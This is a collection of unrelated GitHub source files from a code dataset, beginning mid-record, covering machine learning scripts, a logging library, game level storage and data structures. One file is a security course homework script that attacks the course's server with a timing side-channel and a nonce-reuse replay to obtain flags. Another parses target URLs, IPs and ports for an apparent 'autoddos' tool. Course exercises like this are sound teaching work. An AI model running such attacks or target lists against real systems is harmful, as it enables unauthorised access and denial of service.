in all_samples]\n assert set(expected_sample_names).issubset(set(all_sample_names))\n\n def test_import_same_samples_twice__integrity_error(self):\n handler = GemstoneSubmissionHandler(context=self.handler_context, app=self.app)\n sample_sub_file = self._create_csv_organization_file()\n with self.assertRaises(IntegrityError):\n handler.handle(sample_sub_file)\n handler.handle(sample_sub_file)\n","repo_name":"GitEdvard/commonlims-sandbox","sub_path":"commonlims/test/test_gemstone_sample_submission_csv.py","file_name":"test_gemstone_sample_submission_csv.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40247437209","text":"# -*- coding: utf-8 -*-\nimport os # import the os module\nimport MeCab\nfrom gensim import corpora\n\ndef bowTest():\n # nouns extracted earlier by running morphological analysis on one IT Lifehack article\n words = ['アナタ', 'ブラウザ', 'ブック', 'マーク', 'ブック', 'マーク', '管理', 'ライフ', 'リスト', 'オススメ', '最近', 'ネット', 'サーフィン', '際', '利用', 'の', 'ライフ', 'リスト', 'サイト', 'ライフ', 'リスト', 'ひとこと', '自分', '専用', 'ブックマークサイト', 'ブラウザ', 'スタート', 'ページ', 'ブラウザ', 'ブック', 'マーク', '管理', '不要', '便利', 'サイト', 'の']\n\n # BoW\n dictionary = corpora.Dictionary.load_from_text('livedor_dokujo.txt')\n vec = dictionary.doc2bow(words)\n print(vec)\n\n\n# only excerpts of two articles were taken\n# the first is an IT Lifehack article, the second is from Dokujo Tsushin.\nif __name__ == '__main__':\n 
bowTest()\n","repo_name":"shiratsu/mecabtest","sub_path":"bowTestFirst.py","file_name":"bowTestFirst.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14637558518","text":"import os, glob\nfrom datetime import datetime\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nimport torch\nfrom torchvision import models, transforms\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.nn import Softmax\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"2\" \nfrom torch import nn\n\ntest_file_name = '../data/test.txt'\nbatch_size = 256\nnum_classes = 6\n\n# model_path = '../models/perc98_inception_v3_lr_0.001' + '/*' all_data_res34_lr_0.05 #\nmodel_path = '../models/aug8k_inception_v3_lr_0.001' + '/*'\narch = 'inception_v3'\narch_model = models.inception_v3\noutput_folder = '../submissions'\n\n\nclass Read_Dataset():\n \n def __init__(self, file_path,transform=None):\n self.data = pd.read_csv(file_path, header = None, sep = ' ')\n self.img_path = self.data.iloc[:, 0].tolist() \n self.transform = transform\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n img_path = self.img_path[index]\n image = Image.open(img_path).convert('RGB')\n \n if self.transform is not None:\n image = self.transform(image)\n \n return img_path, image\n \n \ndef get_dataloader(test_file_name, batch_size=64):\n\n image_datasets = Read_Dataset( file_path = test_file_name, transform = data_transforms)\n\n dataloader = DataLoader(image_datasets, batch_size = batch_size, shuffle=False, num_workers=4)\n\n print ('dataset_size: {}'.format( len(image_datasets) ) )\n return dataloader\n\n \n \ndef get_model(model_path, arch_model, use_gpu = True):\n\n list_of_files = glob.glob(model_path) \n model_file = max(list_of_files, key=os.path.getctime)\n print('path {} and model file {}'.format(model_path, model_file))\n\n model_ft = arch_model(pretrained=True)\n \n if arch_model == models.densenet121:\n model_ft.classifier = torch.nn.Linear(model_ft.classifier.in_features, num_classes)\n \n elif arch_model == models.inception_v3:\n num_ftrs_aux = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs_aux, num_classes)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n \n else:\n model_ft.fc = nn.Linear(model_ft.fc.in_features, num_classes)\n\n checkpoint = torch.load(model_file)\n model_ft.load_state_dict(checkpoint['state_dict'])\n if use_gpu:\n model_ft = model_ft.cuda()\n return model_ft\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\n \n \ndef get_predictions(model, dataloaders, use_gpu = True):\n \n model_ft.eval()\n results = pd.DataFrame()\n with torch.no_grad():\n \n for i, data in tqdm(enumerate(dataloaders)):\n \n path, inputs = data\n if use_gpu:\n inputs = inputs.cuda()\n \n outputs = model_ft(inputs)\n _, preds = torch.max(outputs.data, 1)\n# outputs, aux = model(inputs)\n \n# preds = outputs.data.cpu().numpy()\n for j in range(outputs.size()[0]):\n# label_name = preds[j].argsort()[-3:][::-1]\n label_name = int( preds[j].cpu().numpy() ) + 1\n prob = softmax (outputs.data[j].cpu().numpy())\n temp = pd.DataFrame({'path': [path[j]], 'category' : [label_name], 'Probablity' : [prob] })\n results = results.append(temp)\n \n return results \n \n \nif __name__ ==\"__main__\":\n\n 
if arch_model == models.inception_v3:\n data_transforms = transforms.Compose([\n transforms.Resize( (299,299)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ])\n \n else:\n data_transforms = transforms.Compose([\n transforms.Resize( (224,224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n \n\n #getting dataloader\n dataloader = get_dataloader(test_file_name, batch_size)\n \n #loading the model\n model_ft = get_model(model_path, arch_model)\n \n submission = get_predictions(model_ft, dataloader)\n submission['id'] = [x.split('/')[-1].split('.')[0] for x in submission.path]\n \n #writing probablity file \n results_prob = submission[['id', 'category', 'Probablity' ]]\n\n \n filename = f'aug8k_{arch}_prob_{datetime.now().strftime(\"%Y%m%d%H%M%S\")}.csv'\n results_prob.to_csv(f'{output_folder}/{filename}', index=False)\n \n submission = submission[['id', 'category']]\n# submission.Category = [ ','.join([str(x) for x in list(y)]) for y in submission.category.tolist()]\n \n filename = f'aug8k_{arch}_submission_{datetime.now().strftime(\"%Y%m%d%H%M%S\")}.csv'\n submission.to_csv(f'{output_folder}/{filename}', index=False)\n ","repo_name":"sandeep307/PAN_IIT_AI_Hackathon","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23472890481","text":"#!/usr/bin/env python\n#coding:utf-8\n\nimport logging\nfrom cloghandler import ConcurrentRotatingFileHandler\n\ntry:\n import thread\n import threading\nexcept ImportError:\n thread = None\n\ntry:\n from utils import generate_trace_id,getHostName\nexcept ImportError:\n from mlog4py.utils import generate_trace_id,getHostName\n\nCRITICAL = logging.CRITICAL\nFATAL = logging.FATAL\nERROR = logging.ERROR\nWARNING = logging.WARN\nWARN = logging.WARN\nINFO = logging.INFO\nDEBUG = logging.DEBUG\nNOTSET = logging.NOTSET\n\n\nclass MLoggerAdapter(logging.LoggerAdapter):\n def process(self, msg, kwargs):\n kwarg = {}\n if 'extra' not in kwarg:\n kwarg[\"extra\"] = self.extra\n\n if 'tags' in kwargs:\n kwarg[\"extra\"]['tags'] = kwargs['tags']\n\n if 'traceid' in kwargs:\n kwarg[\"extra\"]['traceid'] = kwargs['traceid']\n\n if 'spanid' in kwargs:\n kwarg[\"extra\"]['spanid'] = kwargs['spanid']\n\n return msg, kwarg\n\n def setExtra(self,**kwargs):\n if 'tags' in kwargs:\n self.extra['tags'] = kwargs['tags']\n\n if 'traceid' in kwargs:\n self.extra['traceid'] = kwargs['traceid']\n\n if 'spanid' in kwargs:\n self.extra['spanid'] = kwargs['spanid']\n\n def initTraceid(self):\n self.extra['traceid'] = generate_trace_id()\n\nclass MLoger(object):\n def __init__(self, name, level=logging.DEBUG,filename=None):\n self.name = name\n self.filename = filename\n self.level = level\n self.appName = None\n self.traceID = None\n self.spanID = None\n self.tags = None\n self.config = None\n self.logger = None\n self.extra_dict = {\"psm\":'-',\"traceid\": '-', \"spanid\": '-', \"hostname\": '-', \"tags\": '-'}\n self.formatter = \"%(levelname)s|%(psm)s|%(asctime)s.%(msecs)03d+08:00|%(traceid)s|%(spanid)s|%(hostname)s|%(tags)s|%(message)s\"\n\n\n def setBasicConfig(self,*kwargs):\n self.config = kwargs\n\n def setLevel(self,level):\n self.level = level\n\n def setFileName(self,filename,path='/data/logs'):\n self.filename = r\"%s/%s\" %(path,filename)\n\n def setTraceID(self,id):\n self.traceID = id\n\n def setSpanID(self,id):\n self.spanID = 
id\n\n def setTags(self,tag):\n self.tags = tag\n\n def setAppName(self,app):\n self.appName = app\n\n def loadBasicConfig(self):\n logging.basicConfig(filename=self.filename, level=self.level, format=self.formatter, datefmt='%Y-%m-%dT%I:%M:%S')\n\n def initSession(self):\n for key in self.extra_dict:\n if 'psm' is key:\n self.extra_dict[key] = self.appName\n if 'traceid' is key:\n self.extra_dict[key] = generate_trace_id()\n if 'hostname' is key:\n self.extra_dict[key] = getHostName()\n\n def getLogger(self,name):\n if self.logger is None:\n #self.loadBasicConfig()\n self.initSession()\n logger = logging.getLogger(name)\n logger.setLevel(self.level)\n\n if not logger.handlers:\n th = ConcurrentRotatingFileHandler(filename=self.filename, mode='a', maxBytes=200 * 1024 * 1024, backupCount=8)\n formatter = logging.Formatter(self.formatter,datefmt='%Y-%m-%dT%I:%M:%S')\n th.setFormatter(formatter)\n logger.addHandler(th)\n\n self.logger = MLoggerAdapter(logger, self.extra_dict)\n print(\"logger.handlers: %s\" % logger.handlers)\n\n return self.logger\n\nclass RootLogger(MLoger):\n def __init__(self, level):\n MLoger.__init__(self, \"root\", level)\n\nroot = RootLogger(logging.DEBUG)\n\nif thread:\n _lock = threading.RLock()\nelse:\n _lock = None\n\ndef _acquireLock():\n if _lock:\n _lock.acquire()\n\ndef _releaseLock():\n if _lock:\n _lock.release()\n\n\ndef basicConfig(**kwargs):\n _acquireLock()\n try:\n filename = kwargs.get(\"filename\")\n path = kwargs.get(\"filepath\")\n if filename and path:\n root.setFileName(filename,path)\n else:\n root.setFileName(filename)\n\n level = kwargs.get(\"level\")\n if level is not None:\n root.setLevel(level)\n\n app = kwargs.get(\"app\")\n if app is not None:\n root.setAppName(app)\n\n finally:\n _releaseLock()\n\ndef getLogger(name=None):\n if not name or isinstance(name, str) and name == root.name:\n return root.logger\n return root.getLogger(name)\n","repo_name":"Hoavy/mlog4py","sub_path":"src/mlog4py/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38572102521","text":"import re\n\nfrom spam_units import Unit, IP, Port\n\n\ndef msg_parse_units(message: str) -> [Unit]:\n unit_strs = re.compile(\n r'(https?:\\/\\/[\\w\\-\\.]+\\.\\w{2,5})\\s+?\\n((?:\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\s?\\(.*\\)\\s?\\n)+)',\n re.I | re.M\n ).findall(message)\n\n units = []\n for unit_str in unit_strs:\n unit = Unit(unit_str[0])\n\n ip_strs = re.compile(\n r'(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\s?\\(.*\\)\\s?\\n)',\n re.I | re.M\n ).findall(unit_str[1])\n\n for ip_str in ip_strs:\n parsed_ip = re.compile(r'(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\\s\\((.*)\\)', re.I).findall(ip_str)[0]\n ip = IP(parsed_ip[0])\n\n port_strs = re.compile(r'(\\d+)/(tcp|udp|http)', re.I).findall(parsed_ip[1])\n\n for port_str in port_strs:\n port = Port(port_str[0])\n port.protocol = port_str[1].lower()\n ip.ports.append(port)\n unit.ips.append(ip)\n units.append(unit)\n\n return units\n","repo_name":"Linguisto/autoddos","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70486819716","text":"from pwn import *\nimport random\n\ndef flag1():\n def check_flag(s):\n sen = ''\n while 'Timmy' not in sen:\n sen = s.recvline().decode()\n if 'Amy' in sen:\n flag = 
s.recvuntil('}').decode().split('\\n')[-1]\n return flag\n else: return None\n\n def get_time(s):\n sen = ''\n while 'You' not in sen and 'Timmy' not in sen:\n sen = s.recvline().decode()\n sen = sen.split()[-1]\n minute, second, micro = int(sen[:2]), int(sen[3: 5]), int(sen[-2:])\n second += 60 * (minute)\n micro = second * 10**6 + micro * 10**4\n return micro\n\n def get_len():\n length = 0\n while True:\n length += 1\n s = remote('cns.csie.org', 10224)\n s.sendlineafter('>', '1' * length)\n start = get_time(s)\n end = get_time(s)\n s.close()\n if end - start > 1000: return length\n return None\n\n def get_flag(length):\n ans = '0' * length\n for i in range(length - 1):\n d, m = None, 0\n for digit in '0123456789':\n trial = ans[:i] + digit + ans[i + 1:]\n s = remote('cns.csie.org', 10224)\n s.sendlineafter('>', trial)\n start = get_time(s)\n end = get_time(s)\n s.close()\n if end - start > m:\n m = end - start\n d = digit\n print(f'the {i}-th digit is {d}')\n ans = ans[:i] + d + ans[i + 1:]\n \n for digit in '0123456789':\n trial = ans[:length - 1] + digit\n s = remote('cns.csie.org', 10224)\n s.sendlineafter('>', trial)\n flag = check_flag(s)\n s.close()\n if flag is not None:\n print(f'the number is {trial}')\n return flag\n\n return None\n\n length = get_len()\n if length is None:\n print('something went wrong...')\n exit()\n flag = get_flag(length)\n if flag is None:\n print('something went wrong...')\n exit()\n return flag\n\ndef flag2():\n nonce_table = {}\n nonce = [3599364109]\n\n def get_flag(s, mesg):\n s.sendlineafter('>', mesg)\n while True:\n line = s.recvline().decode()\n if 'CNS' in line:\n return line\n return None\n\n def get_nonce(s, na):\n nonlocal nonce_table, nonce\n s.sendlineafter('>', str(na))\n while True:\n line = s.recvline().decode()\n if 'This is my message' in line:\n nt = int(line.split(':')[-1])\n if nt not in nonce:\n nonce.append(nt)\n elif 'This is the hash' in line:\n h = line.split(':')[-1].strip()\n break\n print(f'inserted {(nt, na)} in table, current size is {len(nonce_table)}')\n nonce_table[(nt, na)] = h\n if (na, nt) in nonce_table and na != nt:\n return (na, nt)\n return None\n\n while True:\n s = remote('cns.csie.org', 10225)\n pair = get_nonce(s, random.choice(nonce))\n if pair is not None:\n flag = get_flag(s, nonce_table[pair])\n return flag\n s.close()\n break\n s.close()\n\nif __name__ == '__main__':\n flag1 = flag1()\n flag2 = flag2()\n print(flag1)\n print(flag2)\n\n \n\n\n\n","repo_name":"cdes5804/NTU_CNS_2020","sub_path":"hw2/code/code5.py","file_name":"code5.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23394269911","text":"import sys\nimport math\n\ndef is_palendrome(number):\n number_string = str(number)\n return number_string == number_string[::-1]\n\ndef main(argv):\n if len(argv) != 2:\n sys.exit('Usage: python filename.py <input_file> <output_file>')\n with open(argv[0], 'r') as data, open(argv[1], 'w+') as output:\n lines = map(lambda s: s.strip(), data.readlines())\n case = 1\n for line in lines[1:]:\n solution = 0\n range_list = map(int, line.split())\n lower_range_square = int(math.sqrt(range_list[0]-1)) + 1\n upper_range_square = int(math.sqrt(range_list[1]))\n for i in range(lower_range_square, upper_range_square + 1):\n if is_palendrome(i) and is_palendrome(i**2):\n solution += 1;\n output.write(\"Case #{}: {}\\n\".format(case, solution))\n case += 1\n data.close()\n output.close()\n\nif __name__ == 
'__main__':\n main(sys.argv[1:])\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2288.py","file_name":"2288.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10059291499","text":"import mysql.connector as sq\nimport numpy as np\nfrom data import *\nimport random as rd\nimport pickle as pk\nimport os, math\n\ndef addleveldata(tileset):\n leveldata = []\n def add(x, y, obj, sp = {}):\n nonlocal leveldata\n if obj.isdigit():\n leveldata.append([x, y, sp.get('w', -1), sp.get('h', -1), obj, sp])\n else:\n tempimg = tileset[obj]\n leveldata.append([x, y, tempimg[1], tempimg[2], obj, sp])\n def addrow(x, y, obj, sp, length):\n w = tileset[obj][1]\n for i in range(length):\n add(x + w * i, y, obj, sp)\n def addcol(x, y, obj, sp, length):\n h = tileset[obj][2]\n for i in range(length):\n add(x, y + h * i, obj, sp)\n ###\n add(395, 400, 'grassLedgeLeft.png', {'coll': 0})\n add(1030, 400, 'grassLedgeRight.png', {'coll': 0})\n for i in range(14):\n addrow(400, 400 + i * 70, 'grassCenter.png', {'coll': 0, 'dark': 100}, 9)\n addrow(400, 400, 'grassHalfMid.png', {'coll': 'up', 'front': 1}, 9)\n ###\n add(820, 190, 'grassHillLeft.png', {'coll': 'tri'})\n add(890, 190, 'grassHillLeft2.png', {})\n add(890, 120, 'grassHillLeft.png', {'coll': 'tri'})\n add(960, 120, 'grassHillLeft2.png', {})\n add(960, 50, 'grassHillLeft.png', {'coll': 'tri'})\n add(960, 190, 'grassCenter.png', {})\n add(1030, 50, 'grassMid.png', {})\n add(1030, 120, 'grassCenter.png', {})\n add(1030, 190, 'grassCenter.png', {})\n add(1100, 50, 'grassCliffRight.png', {})\n ###\n addrow(540, 610, 'grassHalfMid.png', {'coll': 'up', 'front': 1}, 10)\n ###\n for i in range(3):\n addcol(1030 + i * 70, 610, 'grassCenter.png', {'coll': 0, 'dark': 100}, 6)\n ###\n add(540, 190, 'grassHillRight.png', {'coll': 'tri2'})\n add(470, 190, 'grassLeft.png', {})\n ###\n add(0, 0, '2', {'txt': \"Why, hello there\", 'size': 100, 'colour': blue, 'front': 1})\n ###\n add(750, 820, 'grass.png', {'move': 'sin', 'sinpower': 2, 'sinlength': 300, 'sinvalue': 0, 'sintemp': 750, 'vel': 0, 'axis': 0})\n l = np.array(leveldata)\n l = np.append(l, l[:, :2], axis = 1)\n return l\n\n\ndef connect(raw_ = True):\n global con, cur\n con = sq.connect(user = 'root', host = 'localhost', passwd = mysql_password, allow_local_infile = True, db = 'game_server', raw = raw_)\n cur = con.cursor()\n\ndef createleveltable_old():\n global con, cur\n cur.execute('create table {} (l_id int, x int, y int, w int, h int, obj varchar(30), sp varchar(200))'.format('levels'))\n\ndef createtables():\n global con, cur\n cur.execute('create database if not exists game_server')\n cur.execute('create table if not exists {} (l_no int, l_data longblob)'.format('level_data'))\n cur.execute('create table if not exists {} (id int, level_name varchar(30), creator varchar(30), play_count int, published varchar(3))'.format('game_data'))\n cur.execute('create table if not exists {} (username varchar(30), password varchar(30))'.format('users'))\n \ndef export(leveldata, lno):\n global con, cur\n connect(True)\n pickled_data = pk.dumps(leveldata)\n cur.execute('delete from level_data where l_no = %s', (lno,))\n cur.execute('insert into level_data values (%s, %s)', (lno, pickled_data))\n con.commit()\n con.close()\n\ndef new(lno):\n global con, cur\n connect(True)\n pickled_data = pk.dumps(np.array([]))\n cur.execute('insert into level_data values (%s, %s)', (lno, 
pickled_data))\n con.commit()\n con.close()\n\ndef set_publish(state, lno):\n connect(False)\n cur.execute('update game_data set published = %s where id = %s', (state, lno))\n con.commit()\n con.close()\n\ndef importleveldata(lno):\n global con, cur\n connect(True)\n cur.execute('select * from level_data where l_no = {}'.format(lno))\n data = cur.fetchall()\n data = data[0][1]\n data = pk.loads(data)\n data = np.array(data)\n con.close()\n return data\n \ndef export_old(leveldata, lno):\n global con, cur\n leveldata = np.insert(leveldata, 0, lno, axis = 1)\n os.chdir(os.path.dirname(__file__))\n np.savetxt('data.csv', leveldata, delimiter = ';', fmt = '%s')\n cur.execute('set global local_infile = 1')\n cur.execute('delete from levels where l_id = {}'.format(lno))\n cur.execute('load data local infile \"{}\" into table {} fields terminated by \";\" lines terminated by \"\\n\"'.format(os.path.join(os.getcwd(), 'data.csv'), 'levels'))\n con.commit()\n con.close()\n os.remove('data.csv')\n \ndef importleveldata_old(lno):\n global con, cur\n if not con.is_connected():\n connect()\n cur.execute('select * from levels where l_id = {}'.format(lno))\n data = cur.fetchall()\n for i in range(len(data)):\n data[i] = list(data[i])\n data[i].pop(0)\n for j in range(4):\n data[i][j] = int(data[i][j])\n data[i][5] = eval(data[i][5])\n data = np.array(data)\n data = np.append(data, data[:, :2], axis = 1)\n return data\n\ndef get_published(lno):\n global con, cur\n connect(False)\n cur.execute('select published from game_data where id = %s', (lno,))\n temp = cur.fetchall()\n con.close()\n return temp[0][0]\n \n \ndef publish(lno):\n global con, cur\n connect(False)\n cur.execute(\"update game_data set published = 'yes' where id = %s\", (lno,))\n con.commit()\n con.close()\n\ndef unpublish(lno):\n global con, cur\n connect(False)\n cur.execute(\"update game_data set published = 'no' where id = %s\", (lno,))\n con.commit()\n con.close()\n\n\n","repo_name":"rithik-raja/platform-game","sub_path":"leveldata_retriever.py","file_name":"leveldata_retriever.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17273209817","text":"import librosa\nimport librosa.display\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import specgram\n\ndef LoadAudioFiles(filePath):\n rawSound=[]\n for fp in filePath:\n X,SampleRate =librosa.load(fp)\n rawSound.append(X)\n return rawSound\n\n \ndef getAudioPaths():\n filePathList=[]\n rootPath=os.getcwd()\n f= os.path.join(rootPath,'ESC-50-master')\n classDirNames=[ name for name in os.listdir(f) if os.path.isdir(os.path.join(f,name))]\n for subDirName in classDirNames:\n #print(subDirName)\n fileRootPath=os.path.join(f,subDirName)\n filePath=[ name for name in os.listdir(fileRootPath) if os.path.isfile(os.path.join(fileRootPath,name))]\n for xx in range(len(filePath)-1):\n #print(os.path.join(fileRootPath,filePath[xx])) \n filePathList.append((subDirName, os.path.join(fileRootPath,filePath[xx])))\n return filePathList\n\n\ndef plotWave(soundName,rawSound):\n hfig=plt.figure()\n i=1\n for n,f in zip(soundName,rawSound):\n plt.subplot(10,1,i)\n librosa.display.waveplot(np.array(f),sr=22050)\n plt.title(n.title())\n i +=1;\n plt.show()\n\ndef plotSpecgram(soundName,rawSound):\n i=1\n # hfig=plt.figure(figsize=(25,60),dpi=900)\n hfig=plt.figure()\n for n,f in zip(soundName,rawSound):\n plt.subplot(10,1,i)\n specgram(np.array(f),Fs=22050)\n 
plt.title(n)\n i+=1\n #plt.subtitle(\"Figure 2: Spectrogram\",x=0.5, y=0.915,fontsize=18)\n plt.show()\n","repo_name":"sunnypiggggy/dcnn","sub_path":"DCNN/audioFileUtility.py","file_name":"audioFileUtility.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43206956502","text":"import sys\ninput = sys.stdin.readline\n\nNEXT = 2\nDATA = 1\nPREV = 0\n\ndef dll_processor(operations):\n\n front = None\n end = None\n\n for o in operations:\n if o[0] == \"insert\":\n front, end = insert(front, end, o[1])\n elif o[0] == \"delete\":\n front, end = delete(front, end, o[1])\n elif o[0] == \"deleteFirst\":\n front, end = delete_first(front, end)\n elif o[0] == \"deleteLast\":\n front, end = delete_last(front, end)\n\n return get_list(front)\n\ndef get_list(front):\n if not front:\n return []\n\n l = []\n target = front\n while True:\n l.append(target[DATA])\n if not target[NEXT]:\n break\n target = target[NEXT]\n return l\n\ndef insert(front, end, target):\n node = [None, target, None]\n if front:\n front[PREV] = node\n node[NEXT] = front\n return node, end\n else:\n return node, node\n\ndef delete(front, end, target):\n\n delete_node = front\n while not delete_node[DATA] == target:\n delete_node = delete_node[NEXT]\n if delete_node == None:\n return front, end\n\n if delete_node[PREV] == None:\n delete_node[NEXT][PREV] = None\n return delete_node[NEXT], end\n elif delete_node[NEXT] == None:\n delete_node[PREV][NEXT] = None\n return front, delete_node[PREV]\n else:\n delete_node[NEXT][PREV] = delete_node[PREV]\n delete_node[PREV][NEXT] = delete_node[NEXT]\n return front, end\n\ndef delete_last(front, end):\n\n if not end[PREV]:\n return None, None\n else:\n end[PREV][NEXT] = None\n return front, end[PREV]\n\ndef delete_first(front, end):\n\n if not front[NEXT]:\n return None, None\n else:\n front[NEXT][PREV] = None\n return front[NEXT], end\n\ndef main():\n n_list = int(input())\n target_list = [input().split() for i in range(n_list)]\n print(*dll_processor(target_list))\n\nif __name__ == \"__main__\":\n main()","repo_name":"MutsuOno/AOJ","sub_path":"ALDS1/3_C_DoublyLinkedList2.py","file_name":"3_C_DoublyLinkedList2.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25211892025","text":"from datetime import datetime\nimport json\nimport os\n\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import default_backend\nimport ssl\nimport socket\n\nimport util\nimport util_def\n\n\ndef parse_date(date):\n # Convert the original date string to a datetime object\n dt = datetime.strptime(date, \"%b %d %H:%M:%S %Y %Z\")\n\n # Format the datetime object to the desired format\n formatted_date = dt.strftime(\"%b %d %Y\")\n\n return formatted_date\n\n\n\ndef calc_duration(start, end):\n start = parse_date(start)\n end = parse_date(end)\n\n # Convert the date string to a datetime object\n start = datetime.strptime(start, \"%b %d %Y\").date()\n end = datetime.strptime(end, \"%b %d %Y\").date()\n\n num_days = (end - start).days\n return num_days\n\n\n\ndef get_certificate_signature_algorithm(cert):\n cert_object = x509.load_der_x509_certificate(cert, default_backend())\n signature_algorithm = cert_object.signature_algorithm_oid._name\n return signature_algorithm\n\n\ndef determine_port_from_website_protocol(url):\n if url.startswith(\"http://\"):\n return 80\n \n if 
url.startswith(\"https://\"):\n return 443\n\n\n# Extracts and saves the TLS/SSL certificate info of the url if available\ndef extract_certificate_info(website_url, folder_path):\n error_tag = \"Connection Error\"\n port = determine_port_from_website_protocol(website_url)\n\n # Create a socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Get the hostname from the url\n hostname = util.extract_hostname(website_url)\n if hostname is None:\n status = \"Failed\"\n print(\"Error extracting certificate info...\")\n return status\n \n\n # Wrap the socket with SSL/TLS\n context = ssl.create_default_context()\n with context.wrap_socket(sock, server_hostname=hostname) as ssock:\n try:\n # Establish a connection to the website\n ssock.connect((hostname, port))\n\n # Get the TLS certificate information\n cert = ssock.getpeercert()\n cert_binary = ssock.getpeercert(binary_form=True)\n\n # Extract certificate details\n subject = dict(x[0] for x in cert[\"subject\"])\n alt_subject= cert[\"subjectAltName\"]\n issuer = dict(x[0] for x in cert[\"issuer\"])\n version = cert[\"version\"]\n not_before = cert[\"notBefore\"]\n not_after = cert[\"notAfter\"]\n valid_period = calc_duration(not_before, not_after)\n serial_number = cert[\"serialNumber\"]\n signature_algorithm = get_certificate_signature_algorithm(cert_binary)\n protocol_version = ssock.version()\n\n except Exception as e:\n print(\"Cert Extraction Error: \", e)\n subject = {\n \"commonName\": error_tag,\n \"organizationName\": error_tag,\n \"localityName\": error_tag,\n \"stateOrProvinceName\": error_tag,\n \"countryName\": error_tag,\n \"businessCategory\": error_tag,\n \"serialNumber\": error_tag,\n \"jurisdictionState\": error_tag,\n \"jurisdictionLocality\": error_tag,\n }\n\n issuer = {\n \"countryName\": error_tag,\n \"organizationName\": error_tag,\n \"organizationalUnitName\": error_tag,\n \"commonName\": error_tag,\n }\n version = error_tag \n not_before = error_tag \n not_after = error_tag \n valid_period = error_tag \n serial_number = error_tag \n signature_algorithm = error_tag\n protocol_version = error_tag\n alt_subject = [error_tag]\n \n finally:\n ssock.close()\n \n data = {\n \"website url\": website_url,\n \"hostname\": hostname,\n \"subject\": subject,\n \"issuer\": issuer,\n \"version\": version,\n \"not_before\": not_before,\n \"not_after\": not_after,\n \"valid_period\": valid_period,\n \"serial_number\": serial_number,\n \"signature_algo\": signature_algorithm,\n \"protocol_version\": protocol_version,\n \"alternate subject name\": alt_subject\n }\n\n json_file_output_path = os.path.join(folder_path, util_def.FILE_CERT)\n util.save_data_to_json_format(json_file_output_path, data)\n \n print(\"Certificate info saved.\")\n status = \"Success\"\n \n return status\n","repo_name":"Py0000/Playwright_Crawler","sub_path":"src/crawler_certificate_extractor.py","file_name":"crawler_certificate_extractor.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"356165723","text":"import copy\n\n# Demo libs\nimport spiga.demo.analyze.extract.processor as pr\n\n\nclass VideoAnalyzer:\n def __init__(self, tracker, processor=pr.EmptyProcessor()):\n self.tracker = tracker\n self.processor = processor\n self.tracked_obj = []\n\n def process_frame(self, image):\n image = copy.copy(image)\n self.tracked_obj = self.tracker.process_frame(image, self.tracked_obj)\n if len(self.tracked_obj) > 0:\n self.tracked_obj = 
self.processor.process_frame(image, self.tracked_obj)\n self.tracked_obj = self._add_attributes()\n return self.tracked_obj\n\n def plot_features(self, image, plotter, show_attributes):\n for obj in self.tracked_obj:\n image = obj.plot_features(image, plotter, show_attributes)\n return image\n\n def get_attributes(self, names):\n\n # Check input type\n single_name = False\n if isinstance(names, str):\n names = [names]\n single_name = True\n\n attributes = {}\n for name in names:\n attribute = []\n for obj in self.tracked_obj:\n attribute.append(obj.get_attributes(name))\n attributes[name] = attribute\n\n if single_name:\n return attribute\n else:\n return attributes\n\n def _add_attributes(self):\n for obj in self.tracked_obj:\n if not obj.has_processor():\n obj.attributes += self.processor.attributes\n obj.attributes += self.tracker.attributes\n obj.drawers.append(self.processor.plot_features)\n obj.drawers.append(self.tracker.plot_features)\n return 